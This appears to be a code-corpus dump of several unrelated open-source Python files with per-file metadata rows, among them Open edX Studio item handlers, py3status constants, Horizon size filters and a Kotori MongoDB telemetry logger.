nullout=request.json.get('nullout'),
grader_type=request.json.get('graderType'),
publish=request.json.get('publish'),
)
elif request.method in ('PUT', 'POST'):
return _create_item(request)
else:
return HttpResponseBadRequest(
"Only instance creation is supported without a package_id.",
content_type="text/plain"
)
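# Illustrative request bodies for xblock_handler (hypothetical values, not taken
# from a real course):
#   create:  {"parent_locator": "<parent locator>", "category": "html",
#             "display_name": "Introduction", "boilerplate": "<template name>"}
#   update:  {"metadata": {"display_name": "Week 1"}, "nullout": ["due"],
#             "publish": "make_public"}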
def _save_item(request, usage_loc, item_location, data=None, children=None, metadata=None, nullout=None,
grader_type=None, publish=None):
"""
Saves xblock w/ its fields. Has special processing for grader_type, publish, and nullout and Nones in metadata.
nullout means to truly set the field to None whereas nones in metadata mean to unset them (so they revert
to default).
The item_location is still the old-style location whereas usage_loc is a BlockUsageLocator
"""
store = get_modulestore(item_location)
try:
existing_item = store.get_item(item_location)
except ItemNotFoundError:
if item_location.category in CREATE_IF_NOT_FOUND:
# New module at this location, for pages that are not pre-created.
# Used for course info handouts.
store.create_and_save_xmodule(item_location)
existing_item = store.get_item(item_location)
else:
raise
except InvalidLocationError:
log.error("Can't find item by location.")
return JsonResponse({"error": "Can't find item by location: " + str(item_location)}, 404)
if publish:
if publish == 'make_private':
_xmodule_recurse(existing_item, lambda i: modulestore().unpublish(i.location))
elif publish == 'create_draft':
# This clones the existing item location to a draft location (the draft is
# implicit, because modulestore is a Draft modulestore)
modulestore().convert_to_draft(item_location)
if data:
store.update_item(item_location, data)
else:
data = existing_item.get_explicitly_set_fields_by_scope(Scope.content)
if children is not None:
children_ids = [
loc_mapper().translate_locator_to_location(BlockUsageLocator(child_locator)).url()
for child_locator
in children
]
store.update_children(item_location, children_ids)
# cdodge: also commit any metadata which might have been passed along
if nullout is not None or metadata is not None:
# the postback is not the complete metadata, as there's system metadata which is
# not presented to the end-user for editing. So let's use the original (existing_item) and
# 'apply' the submitted metadata, so we don't end up deleting system metadata.
if nullout is not None:
for metadata_key in nullout:
setattr(existing_item, metadata_key, None)
# update existing metadata with submitted metadata (which can be partial)
# IMPORTANT NOTE: if the client passed 'null' (None) for a piece of metadata that means 'remove it'. If
# the intent is to make it None, use the nullout field
if metadata is not None:
for metadata_key, value in metadata.items():
if metadata_key == "locator_term":
temp_key = "direct_term"
json_array = json.loads(value)
for x in json_array:
old_loc = str(loc_mapper().translate_locator_to_location(x["direct_element_id"]))
i = old_loc.rfind("/")
short_name = old_loc[i+1:]
x["direct_element_id"] = short_name
for every_edge in x["disjunctions"]:
for every_cond in every_edge["conjunctions"]:
old_loc = str(loc_mapper().translate_locator_to_location(every_cond["source_element_id"]))
i = old_loc.rfind("/")
short_name = old_loc[i+1:]
every_cond["source_element_id"] = short_name
temp_value = json.dumps(json_array)
else:
temp_key = metadata_key
temp_value = value
field = existing_item.fields[temp_key]
if temp_value is None:
field.delete_from(existing_item)
else:
try:
temp_value = field.from_json(temp_value)
except ValueError:
return JsonResponse({"error": "Invalid data"}, 400)
field.write_to(existing_item, temp_value)
# Save the data that we've just changed to the underlying
# MongoKeyValueStore before we update the mongo datastore.
existing_item.save()
# commit to datastore
store.update_metadata(item_location, own_metadata(existing_item))
if existing_item.category == 'video':
manage_video_subtitles_save(existing_item, existing_item)
result = {
'id': unicode(usage_loc),
'data': data,
'metadata': own_metadata(existing_item)
}
if grader_type is not None:
result.update(CourseGradingModel.update_section_grader_type(existing_item, grader_type))
# Make public after updating the xblock, in case the caller asked
# for both an update and a publish.
if publish and publish == 'make_public':
_xmodule_recurse(
existing_item,
lambda i: modulestore().publish(i.location, request.user.id)
)
# Note that children aren't being returned until we have a use case.
return JsonResponse(result)
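# Note on the metadata/nullout handling above (illustrative field name "due"):
# sending {"metadata": {"due": null}} deletes the stored value so it falls back
# to the inherited default, whereas {"nullout": ["due"]} explicitly stores None.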
@login_required
@expect_json
def _create_item(request):
"""View for create items."""
parent_locator = BlockUsageLocator(request.json['parent_locator'])
parent_location = loc_mapper().translate_locator_to_location(parent_locator)
try:
category = request.json['category']
except KeyError:
category = 'problem'
display_name = request.json.get('display_name')
if not has_access(request.user, parent_location):
raise PermissionDenied()
parent = get_modulestore(category).get_item(parent_location)
dest_location = parent_location.replace(category=category, name=uuid4().hex)
# get the metadata, display_name, and definition from the request
metadata = {}
data = None
template_id = request.json.get('boilerplate')
if template_id is not None:
clz = XModuleDescriptor.load_class(category)
if clz is not None:
template = clz.get_template(template_id)
if template is not None:
metadata = template.get('metadata', {})
data = template.get('data')
if display_name is not None:
metadata['display_name'] = display_name
get_modulestore(category).create_and_save_xmodule(
dest_location,
definition_data=data,
metadata=metadata,
system=parent.system,
)
if category not in DETACHED_CATEGORIES:
get_modulestore(parent.location).update_children(parent_location, parent.children + [dest_location.url()])
course_location = loc_mapper().translate_locator_to_location(parent_locator, get_course=True)
locator = loc_mapper().translate_location(course_location.course_id, dest_location, False, True)
return JsonResponse({"locator": unicode(locator)})
def _delete_item_at_location(item_location, delete_children=False, delete_all_versions=False):
"""
    Deletes the item at the given Location.
It is assumed that course permissions have already been checked.
"""
store = get_modulestore(item_location)
item = store.get_item(item_location)
if delete_children:
_xmodule_recurse(item, lambda i: store.delete_item(i.location, delete_all_versions))
else:
store.delete_item(item.location, delete_all_versions)
# cdodge: we need to remove our parent's pointer to us so that it is no longer dangling
if delete_all_versions:
parent_locs = modulestore('direct').get_parent_locations(item_location, None)
for parent_loc in parent_locs:
parent = modulestore('direct').get_item(parent_loc)
item_url = item_location.url()
if item_url in parent.children:
children = parent.children
children.remove(item_url)
parent.children = children
modulestore('direct').update_children(parent.location, parent.children)
return JsonResponse()
# pylint: disable=W0613
@login_required
@require_http_methods(("GET", "DELETE"))
def orphan_handler(request, tag=None, package_id=None, branch=None, version_guid=None, block=None):
"""
View for handling orphan related requests. GET gets all of the current orphans.
DELETE removes all orphans (requires is_staff access)
    An orphan is a block whose category is not in the DETACHED_CATEGORIES list, is not the root, and is not reachable
from the root via children
:param request:
:param package_id: Locator syntax package_id
"""
location = BlockUsageLocator(package_id=package_id, branch=branch, version_guid=version_guid, block_id=block)
# DHM: when split becomes back-end, move or conditionalize this conversion
old_location = loc_mapper().translate_locator_to_location(location)
if request.method == 'GET':
if has_access(request.user, old_location):
return JsonResponse(modulestore().get_orphans(old_location, DETACHED_CATEGORIES, 'draft'))
else:
raise PermissionDenied()
if request.method == 'DELETE':
if request.user.is_staff:
items = modulestore().get_orphans(old_location, DETACHED_CATEGORIES, 'draft')
for item in items:
modulestore('draft').delete_item(item, True)
return JsonResponse({'deleted': items})
else:
raise PermissionDenied()
def _get_module_info(usage_loc, rewrite_static_links=True):
"""
    Fetch the metadata, data, and id representation of a leaf module.
:param usage_loc: A BlockUsageLocator
"""
old_location = loc_mapper().translate_locator_to_location(usage_loc)
store = get_modulestore(old_location)
try:
module = store.get_item(old_location)
except ItemNotFoundError:
if old_location.category in CREATE_IF_NOT_FOUND:
# Create a new one for certain categories only. Used for course info handouts.
store.create_and_save_xmodule(old_location)
module = store.get_item(old_location)
else:
raise
data = module.data
if rewrite_static_links:
# we pass a partially bogus course_id as we don't have the RUN information passed yet
        # through the CMS. Also, the contentstore is not RUN-aware at this point in time.
data = replace_static_urls(
module.data,
None,
course_id=module.location.org + '/' + module.location.course + '/BOGUS_RUN_REPLACE_WHEN_AVAILABLE'
)
# Note that children aren't being returned until we have a use case.
return {
'id': unicode(usage_loc),
'data': data,
'metadata': own_metadata(module)
}
| agpl-3.0 | -2,731,989,271,063,219,000 | 42.186158 | 122 | 0.6336 | false |
amureki/lunch-with-channels | places/migrations/0001_initial.py | 1 | 1222 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-31 20:24
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import stdimage.models
import stdimage.utils
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Place',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('name', models.CharField(max_length=255, verbose_name='Name')),
('image', stdimage.models.StdImageField(blank=True, null=True, upload_to=stdimage.utils.UploadToUUID(path='places'), verbose_name='Image')),
('address', models.CharField(max_length=255, verbose_name='Address')),
],
options={
'ordering': ('-created',),
},
),
]
| mit | -6,530,141,570,635,881,000 | 36.030303 | 156 | 0.615385 | false |
smartboyathome/Wonderland-Engine | install_check_to_white_rabbit.py | 1 | 1971 | #!/usr/bin/env python2
"""
Copyright (c) 2012 Alexander Abbott
This file is part of the Cheshire Cyber Defense Scoring Engine (henceforth
referred to as Cheshire).
Cheshire is free software: you can redistribute it and/or modify it under
the terms of the GNU Affero General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.
Cheshire is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for
more details.
You should have received a copy of the GNU Affero General Public License
along with Cheshire. If not, see <http://www.gnu.org/licenses/>.
"""
import WhiteRabbit, os, sys, argparse, shutil, py_compile
class CannotOpenFile(Exception):
def __init__(self, directory):
self.directory = directory
def __repr__(self):
return "Cannot write a file at '{}'.".format(self.directory)
if __name__ == '__main__':
exit_code = 0
parser = argparse.ArgumentParser(description="A tool to help install checks into White Rabbit.")
parser.add_argument('python_file', nargs='*')
args = parser.parse_args()
check_dir = os.path.join(os.path.split(WhiteRabbit.__file__)[0], 'checks')
if not os.path.exists(check_dir) or not os.access(check_dir, os.W_OK):
raise CannotOpenFile(check_dir)
for f in args.python_file:
abspath = os.path.abspath(f)
if not os.path.exists(abspath) or not os.access(abspath, os.R_OK):
print "Could not read a file at '{}'.".format(abspath)
exit_code = 1
continue
path, name = os.path.split(abspath)
new_path = os.path.join(check_dir, name)
shutil.copy(abspath, new_path)
py_compile.compile(new_path)
sys.exit(exit_code) | agpl-3.0 | 2,859,696,470,728,600,000 | 39.244898 | 100 | 0.674277 | false |
Andrwe/py3status | py3status/constants.py | 1 | 7015 | # This file contains various useful constants for py3status
GENERAL_DEFAULTS = {
"color_bad": "#FF0000",
"color_degraded": "#FFFF00",
"color_good": "#00FF00",
"color_separator": "#333333",
"colors": False,
"interval": 5,
"output_format": "i3bar",
}
MAX_NESTING_LEVELS = 4
TIME_FORMAT = "%Y-%m-%d %H:%M:%S"
TZTIME_FORMAT = "%Y-%m-%d %H:%M:%S %Z"
TIME_MODULES = ["time", "tztime"]
I3S_INSTANCE_MODULES = [
"battery",
"cpu_temperature",
"disk",
"ethernet",
"memory",
"path_exists",
"run_watch",
"tztime",
"volume",
"wireless",
]
I3S_SINGLE_NAMES = ["cpu_usage", "ddate", "ipv6", "load", "time"]
I3S_ALLOWED_COLORS = ["color_bad", "color_good", "color_degraded"]
# i3status modules that allow colors to be passed.
# general section also allows colors so is included.
I3S_COLOR_MODULES = ["general", "battery", "cpu_temperature", "disk", "load"]
I3S_MODULE_NAMES = I3S_SINGLE_NAMES + I3S_INSTANCE_MODULES
CONFIG_FILE_SPECIAL_SECTIONS = ["general", "py3status"]
ERROR_CONFIG = """
general {colors = true interval = 60}
order += "static_string py3status"
order += "tztime local"
order += "group error"
static_string py3status {format = "py3status"}
tztime local {format = "%c"}
group error{
button_next = 1
button_prev = 0
fixed_width = False
format = "{output}"
static_string error_min {format = "CONFIG ERROR" color = "#FF0000"}
static_string error {format = "$error" color = "#FF0000"}
}
"""
COLOR_NAMES_EXCLUDED = ["good", "bad", "degraded", "separator", "threshold", "None"]
COLOR_NAMES = {
"aliceblue": "#F0F8FF",
"antiquewhite": "#FAEBD7",
"aqua": "#00FFFF",
"aquamarine": "#7FFFD4",
"azure": "#F0FFFF",
"beige": "#F5F5DC",
"bisque": "#FFE4C4",
"black": "#000000",
"blanchedalmond": "#FFEBCD",
"blue": "#0000FF",
"blueviolet": "#8A2BE2",
"brown": "#A52A2A",
"burlywood": "#DEB887",
"cadetblue": "#5F9EA0",
"chartreuse": "#7FFF00",
"chocolate": "#D2691E",
"coral": "#FF7F50",
"cornflowerblue": "#6495ED",
"cornsilk": "#FFF8DC",
"crimson": "#DC143C",
"cyan": "#00FFFF",
"darkblue": "#00008B",
"darkcyan": "#008B8B",
"darkgoldenrod": "#B8860B",
"darkgray": "#A9A9A9",
"darkgrey": "#A9A9A9",
"darkgreen": "#006400",
"darkkhaki": "#BDB76B",
"darkmagenta": "#8B008B",
"darkolivegreen": "#556B2F",
"darkorange": "#FF8C00",
"darkorchid": "#9932CC",
"darkred": "#8B0000",
"darksalmon": "#E9967A",
"darkseagreen": "#8FBC8F",
"darkslateblue": "#483D8B",
"darkslategray": "#2F4F4F",
"darkslategrey": "#2F4F4F",
"darkturquoise": "#00CED1",
"darkviolet": "#9400D3",
"deeppink": "#FF1493",
"deepskyblue": "#00BFFF",
"dimgray": "#696969",
"dimgrey": "#696969",
"dodgerblue": "#1E90FF",
"firebrick": "#B22222",
"floralwhite": "#FFFAF0",
"forestgreen": "#228B22",
"fuchsia": "#FF00FF",
"gainsboro": "#DCDCDC",
"ghostwhite": "#F8F8FF",
"gold": "#FFD700",
"goldenrod": "#DAA520",
"gray": "#808080",
"grey": "#808080",
"green": "#008000",
"greenyellow": "#ADFF2F",
"honeydew": "#F0FFF0",
"hotpink": "#FF69B4",
"indianred": "#CD5C5C",
"indigo": "#4B0082",
"ivory": "#FFFFF0",
"khaki": "#F0E68C",
"lavender": "#E6E6FA",
"lavenderblush": "#FFF0F5",
"lawngreen": "#7CFC00",
"lemonchiffon": "#FFFACD",
"lightblue": "#ADD8E6",
"lightcoral": "#F08080",
"lightcyan": "#E0FFFF",
"lightgoldenrodyellow": "#FAFAD2",
"lightgray": "#D3D3D3",
"lightgrey": "#D3D3D3",
"lightgreen": "#90EE90",
"lightpink": "#FFB6C1",
"lightsalmon": "#FFA07A",
"lightseagreen": "#20B2AA",
"lightskyblue": "#87CEFA",
"lightslategray": "#778899",
"lightslategrey": "#778899",
"lightsteelblue": "#B0C4DE",
"lightyellow": "#FFFFE0",
"lime": "#00FF00",
"limegreen": "#32CD32",
"linen": "#FAF0E6",
"magenta": "#FF00FF",
"maroon": "#800000",
"mediumaquamarine": "#66CDAA",
"mediumblue": "#0000CD",
"mediumorchid": "#BA55D3",
"mediumpurple": "#9370DB",
"mediumseagreen": "#3CB371",
"mediumslateblue": "#7B68EE",
"mediumspringgreen": "#00FA9A",
"mediumturquoise": "#48D1CC",
"mediumvioletred": "#C71585",
"midnightblue": "#191970",
"mintcream": "#F5FFFA",
"mistyrose": "#FFE4E1",
"moccasin": "#FFE4B5",
"navajowhite": "#FFDEAD",
"navy": "#000080",
"oldlace": "#FDF5E6",
"olive": "#808000",
"olivedrab": "#6B8E23",
"orange": "#FFA500",
"orangered": "#FF4500",
"orchid": "#DA70D6",
"palegoldenrod": "#EEE8AA",
"palegreen": "#98FB98",
"paleturquoise": "#AFEEEE",
"palevioletred": "#DB7093",
"papayawhip": "#FFEFD5",
"peachpuff": "#FFDAB9",
"peru": "#CD853F",
"pink": "#FFC0CB",
"plum": "#DDA0DD",
"powderblue": "#B0E0E6",
"purple": "#800080",
"rebeccapurple": "#663399",
"red": "#FF0000",
"rosybrown": "#BC8F8F",
"royalblue": "#4169E1",
"saddlebrown": "#8B4513",
"salmon": "#FA8072",
"sandybrown": "#F4A460",
"seagreen": "#2E8B57",
"seashell": "#FFF5EE",
"sienna": "#A0522D",
"silver": "#C0C0C0",
"skyblue": "#87CEEB",
"slateblue": "#6A5ACD",
"slategray": "#708090",
"slategrey": "#708090",
"snow": "#FFFAFA",
"springgreen": "#00FF7F",
"steelblue": "#4682B4",
"tan": "#D2B48C",
"teal": "#008080",
"thistle": "#D8BFD8",
"tomato": "#FF6347",
"turquoise": "#40E0D0",
"violet": "#EE82EE",
"wheat": "#F5DEB3",
"white": "#FFFFFF",
"whitesmoke": "#F5F5F5",
"yellow": "#FFFF00",
"yellowgreen": "#9ACD32",
}
ON_TRIGGER_ACTIONS = ["refresh", "refresh_and_freeze"]
POSITIONS = ["left", "center", "right"]
RETIRED_MODULES = {
"nvidia_temp": {
"new": ["nvidia_smi"],
"msg": "Module {old} has been replaced with a module {new}.",
},
"scratchpad_async": {
"new": ["scratchpad"],
"msg": "Module {old} has been replaced with a consolidated module {new}.",
},
"scratchpad_counter": {
"new": ["scratchpad"],
"msg": "Module {old} has been replaced with a consolidated module {new}.",
},
"window_title": {
"new": ["window"],
"msg": "Module {old} has been replaced with a consolidated module {new}.",
},
"window_title_async": {
"new": ["window"],
"msg": "Module {old} has been replaced with a consolidated module {new}.",
},
"weather_yahoo": {
"new": ["weather_owm"],
"msg": "Module {old} is no longer available due to retired Yahoo Weather APIs and new Oath requirements. You can try a different module {new}.",
},
"xkb_layouts": {
"new": ["xkb_input"],
"msg": "Module {old} has been replaced with a module {new} to support sway too.",
},
}
MARKUP_LANGUAGES = ["pango", "none"]
| bsd-3-clause | -4,436,011,993,799,610,400 | 26.727273 | 152 | 0.556522 | false |
evernote/pootle | tests/fixtures/models/project.py | 1 | 1655 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014 Evernote Corporation
#
# This file is part of Pootle.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import pytest
def _require_project(code, name, source_language, **kwargs):
"""Helper to get/create a new project."""
from pootle_project.models import Project
criteria = {
'code': code,
'fullname': name,
'source_language': source_language,
'checkstyle': 'standard',
'localfiletype': 'po',
'treestyle': 'auto',
}
criteria.update(kwargs)
new_project, created = Project.objects.get_or_create(**criteria)
return new_project
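# Example use of the helper (hypothetical project code/name):
#   project = _require_project('terminology', 'Terminology', english,
#                               localfiletype='xliff')
# Keyword arguments override the default criteria defined above.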
@pytest.fixture
def tutorial(projects, english):
"""Require `tutorial` test project."""
return _require_project('tutorial', 'Tutorial', english)
@pytest.fixture
def tutorial_disabled(projects, english):
"""Require `tutorial-disabled` test project in a disabled state."""
return _require_project('tutorial-disabled', 'Tutorial', english,
disabled=True)
| gpl-2.0 | 5,182,014,303,893,477,000 | 30.826923 | 71 | 0.69003 | false |
ikargis/horizon_fod | horizon/templatetags/sizeformat.py | 1 | 2802 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Template tags for displaying sizes
"""
from django import template
from django.utils import formats
from django.utils import translation
register = template.Library()
def int_format(value):
return int(value)
def float_format(value):
return formats.number_format(round(value, 1), 1)
def filesizeformat(bytes, filesize_number_format):
try:
bytes = float(bytes)
except (TypeError, ValueError, UnicodeDecodeError):
return translation.ungettext_lazy("%(size)d byte",
"%(size)d bytes", 0) % {'size': 0}
if bytes < 1024:
return translation.ungettext_lazy("%(size)d",
"%(size)d", bytes) % {'size': bytes}
if bytes < 1024 * 1024:
return translation.ugettext_lazy("%s KB") % \
filesize_number_format(bytes / 1024)
if bytes < 1024 * 1024 * 1024:
return translation.ugettext_lazy("%s MB") % \
filesize_number_format(bytes / (1024 * 1024))
if bytes < 1024 * 1024 * 1024 * 1024:
return translation.ugettext_lazy("%s GB") % \
filesize_number_format(bytes / (1024 * 1024 * 1024))
if bytes < 1024 * 1024 * 1024 * 1024 * 1024:
return translation.ugettext_lazy("%s TB") % \
filesize_number_format(bytes / (1024 * 1024 * 1024 * 1024))
return translation.ugettext_lazy("%s PB") % \
filesize_number_format(bytes / (1024 * 1024 * 1024 * 1024 * 1024))
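# Worked examples (illustrative; the decimal separator follows the active locale):
#   filesizeformat(512, int_format)            -> "512"
#   filesizeformat(2048, int_format)           -> "2 KB"
#   filesizeformat(1536 * 1024, float_format)  -> "1.5 MB"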
@register.filter(name='mbformat')
def mbformat(mb):
if not mb:
return 0
return filesizeformat(mb * 1024 * 1024, int_format).replace(' ', '')
@register.filter(name='mb_float_format')
def mb_float_format(mb):
"""Takes a size value in mb, and prints returns the data in a
saner unit.
"""
if not mb:
return 0
return filesizeformat(mb * 1024 * 1024, float_format)
@register.filter(name='diskgbformat')
def diskgbformat(gb):
return filesizeformat(gb * 1024 * 1024 * 1024,
float_format).replace(' ', '')
| apache-2.0 | -9,080,420,568,618,808,000 | 31.206897 | 78 | 0.654176 | false |
zerotired/kotori | kotori/vendor/hydro2motion/database/mongo.py | 2 | 4486 | # -*- coding: utf-8 -*-
# (c) 2015 Andreas Motl, Elmyra UG <[email protected]>
import txmongo
from autobahn.twisted.wamp import ApplicationRunner, ApplicationSession
from twisted.internet.defer import inlineCallbacks
from twisted.internet.interfaces import ILoggingContext
from twisted.python import log
from zope.interface.declarations import implementer
@implementer(ILoggingContext)
class MongoDatabaseService(ApplicationSession):
"""An application component for logging telemetry data to MongoDB databases"""
#@inlineCallbacks
#def __init__(self, config):
# ApplicationSession.__init__(self, config)
def logPrefix(self):
"""
Return a prefix matching the class name, to identify log messages
related to this protocol instance.
"""
return self.__class__.__name__
#@inlineCallbacks
def onJoin(self, details):
print("Realm joined (WAMP session started).")
# subscribe to telemetry data channel
self.subscribe(self.receive, u'de.elmyra.kotori.telemetry.data')
self.startDatabase()
#self.leave()
    @inlineCallbacks  # required: the method body yields a txmongo Deferred
def startDatabase(self):
#self.mongo = yield txmongo.MongoConnection(host='127.0.0.0', port=27017)
self.mongo = yield txmongo.MongoConnection()
def onLeave(self, details):
print("Realm left (WAMP session ended).")
ApplicationSession.onLeave(self, details)
def onDisconnect(self):
print("Transport disconnected.")
#reactor.stop()
    @inlineCallbacks  # required: receive() yields the txmongo insert Deferred
def receive(self, data):
#print "RECEIVE:", data
# decode wire data
payload = data.split(';')
try:
MSG_ID = int(payload[0])
V_FC = int(payload[1])
V_CAP = int(payload[2])
A_ENG = int(payload[3])
A_CAP = int(payload[4])
T_O2_In = int(payload[5])
T_O2_Out = int(payload[6])
T_FC_H2O_Out = int(payload[7])
Water_In = int(payload[8])
Water_Out = int(payload[9])
Master_SW = bool(payload[10])
CAP_Down_SW = bool(payload[11])
Drive_SW = bool(payload[12])
FC_state = bool(payload[13])
Mosfet_state = bool(payload[14])
Safety_state = bool(payload[15])
Air_Pump_load = float(payload[16])
Mosfet_load = int(payload[17])
Water_Pump_load = int(payload[18])
Fan_load = int(payload[19])
Acc_X = int(payload[20])
Acc_Y = int(payload[21])
Acc_Z = int(payload[22])
AUX = float(payload[23])
GPS_X = int(payload[24])
GPS_Y = int(payload[25])
GPS_Z = int(payload[26])
GPS_Speed = int(payload[27])
V_Safety = int(payload[28])
H2_Level = int(payload[29])
O2_calc = float(payload[30])
lat = float(payload[31])
lng = float(payload[32])
# store data to database
if self.mongo:
telemetry = self.mongo.kotori.telemetry
yield telemetry.insert(dict(MSG_ID = MSG_ID, V_FC = V_FC, V_CAP = V_CAP, A_ENG = A_ENG, A_CAP = A_CAP, T_O2_In = T_O2_In, T_O2_Out = T_O2_Out, T_FC_H2O_Out = T_FC_H2O_Out, Water_In = Water_In, Water_Out = Water_Out, Master_SW = Master_SW, CAP_Down_SW = CAP_Down_SW, Drive_SW = Drive_SW, FC_state = FC_state, Mosfet_state = Mosfet_state, Safety_state = Safety_state, Air_Pump_load = Air_Pump_load, Mosfet_load = Mosfet_load, Water_Pump_load = Water_Pump_load, Fan_load = Fan_load, Acc_X = Acc_X, Acc_Y = Acc_Y, Acc_Z = Acc_Z, AUX = AUX, GPS_X = GPS_X, GPS_Y = GPS_Y, GPS_Z = GPS_Z, GPS_Speed = GPS_Speed, V_Safety = V_Safety, H2_Level = H2_Level, O2_calc = O2_calc, lat = lat, lng = lng))
except ValueError:
print('Could not decode data: {}'.format(data))
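# Note: receive() above expects `data` to be one ';'-separated record of at
# least 33 fields (MSG_ID, voltages, currents, temperatures, switch states,
# loads, accelerometer axes, GPS values, H2/O2 readings, then lat and lng),
# in exactly the order unpacked in the try block.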
def boot_mongo_database(websocket_uri, debug=False, trace=False):
print 'INFO: Starting mongo database service, connecting to broker', websocket_uri
runner = ApplicationRunner(websocket_uri, u'kotori-realm', debug=trace, debug_wamp=debug, debug_app=debug)
runner.run(MongoDatabaseService, start_reactor=False)
| agpl-3.0 | 2,517,970,087,876,669,000 | 42.134615 | 703 | 0.569996 | false |
enriquepablo/terms | terms/core/tests.py | 1 | 2966 | # Copyright (c) 2007-2012 by Enrique Pérez Arnaud <[email protected]>
#
# This file is part of the terms project.
# https://github.com/enriquepablo/terms
#
# The terms project is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The terms project is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with any part of the terms project.
# If not, see <http://www.gnu.org/licenses/>.
import sys
import os
from configparser import ConfigParser
import nose
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from terms.core.terms import Base
from terms.core.network import Network
from terms.core.compiler import KnowledgeBase
CONFIG = '''
[test]
dbms = postgresql://terms:terms@localhost
dbname = test
#dbms = sqlite://
#dbname = :memory:
time = normal
import =
instant_duration = 0
'''
def test_terms(): # test generator
# read contents of tests/
    # feed each test to run_terms
d = os.path.dirname(sys.modules['terms.core'].__file__)
d = os.path.join(d, 'tests')
files = os.listdir(d)
config = ConfigParser()
config.read_string(CONFIG)
config = config['test']
for f in files:
if f.endswith('.test'):
address = '%s/%s' % (config['dbms'], config['dbname'])
engine = create_engine(address)
Session = sessionmaker(bind=engine)
session = Session()
Base.metadata.create_all(engine)
Network.initialize(session)
kb = KnowledgeBase(session, config,
lex_optimize=False,
yacc_optimize=False,
yacc_debug=True)
yield run_terms, kb, os.path.join(d, f)
kb.session.close()
Base.metadata.drop_all(engine)
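# Conventions assumed by run_terms() below (derived from its parsing logic):
# a *.test file holds one Terms sentence per line, '#' lines are comments, and
# whenever a sentence yields a response the next non-empty line (minus its
# trailing '.') is the expected answer for that query.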
def run_terms(kb, fname):
# open file, read lines
# tell assertions
# compare return of questions with provided output
with open(fname) as f:
resp = kb.no_response
for sen in f:
sen = sen.rstrip()
if resp is not kb.no_response:
sen = sen.strip('.')
pmsg = 'returned "%s" is not "%s" at line %d for query: %s'
msg = pmsg % (resp, sen,
kb.parser.lex.lexer.lineno,
kb.parser.lex.lexer.lexdata)
nose.tools.assert_equals(sen, resp, msg=msg)
resp = kb.no_response
elif sen and not sen.startswith('#'):
resp = kb.process_line(sen)
| gpl-3.0 | -4,042,667,240,511,713,300 | 32.693182 | 75 | 0.619224 | false |
pmacosta/putil | sbin/compare_image_dirs.py | 1 | 3856 | #!/usr/bin/env python
# compare_image_dirs.py
# Copyright (c) 2013-2016 Pablo Acosta-Serafini
# See LICENSE for details
# pylint: disable=C0111
# Standard library imports
from __future__ import print_function
import argparse
import glob
import os
import sys
# PyPI imports
import numpy
import scipy
import scipy.misc
# Putil imports
import sbin.functions
###
# Functions
###
def compare_images(fname1, fname2, no_print=True, imgtol=1e-3):
""" Compare two images by calculating Manhattan and Zero norms """
# Source: http://stackoverflow.com/questions/189943/
# how-can-i-quantify-difference-between-two-images
for item in (fname1, fname2):
if not os.path.exists(item):
return False
img1 = scipy.misc.imread(fname1).astype(float)
img2 = scipy.misc.imread(fname2).astype(float)
if img1.size != img2.size:
m_norm, z_norm = 2*[2*imgtol]
else:
# Element-wise for Scipy arrays
diff = img1-img2
# Manhattan norm
m_norm = scipy.sum(numpy.abs(diff))
# Zero norm
z_norm = scipy.linalg.norm(diff.ravel(), 0)
result = bool((m_norm < imgtol) and (z_norm < imgtol))
if not no_print:
print(
'Image 1: {0}, Image 2: {1} -> ({2}, {3}) [{4}]'.format(
fname1, fname2, m_norm, z_norm, result
)
)
return result
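# Example use (hypothetical file names):
#   if compare_images('baseline/plot.png', 'current/plot.png', no_print=False):
#       print('images match within imgtol')
# Images of different sizes are reported as a mismatch without computing norms.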
def main(no_print, dir1, dir2):
""" Compare two images """
# pylint: disable=R0912
for item in [dir1, dir2]:
if not os.path.exists(item):
raise IOError('Directory {0} could not be found'.format(item))
dir1_images = set(
[
os.path.basename(item)
for item in glob.glob(os.path.join(dir1, '*.png'))
]
)
dir2_images = set(
[
os.path.basename(item)
for item in glob.glob(os.path.join(dir2, '*.png'))
]
)
yes_list = []
no_list = []
dir1_list = sorted(list(dir1_images-dir2_images))
dir2_list = sorted(list(dir2_images-dir1_images))
global_result = bool((not dir1_list) and (not dir2_list))
for image in sorted(list(dir1_images & dir2_images)):
result = compare_images(
os.path.join(dir1, image), os.path.join(dir2, image)
)
if (not result) and (not no_print):
no_list.append(image)
global_result = False
elif not no_print:
yes_list.append(image)
print('Files only in {0}'.format(dir1))
if dir1_list:
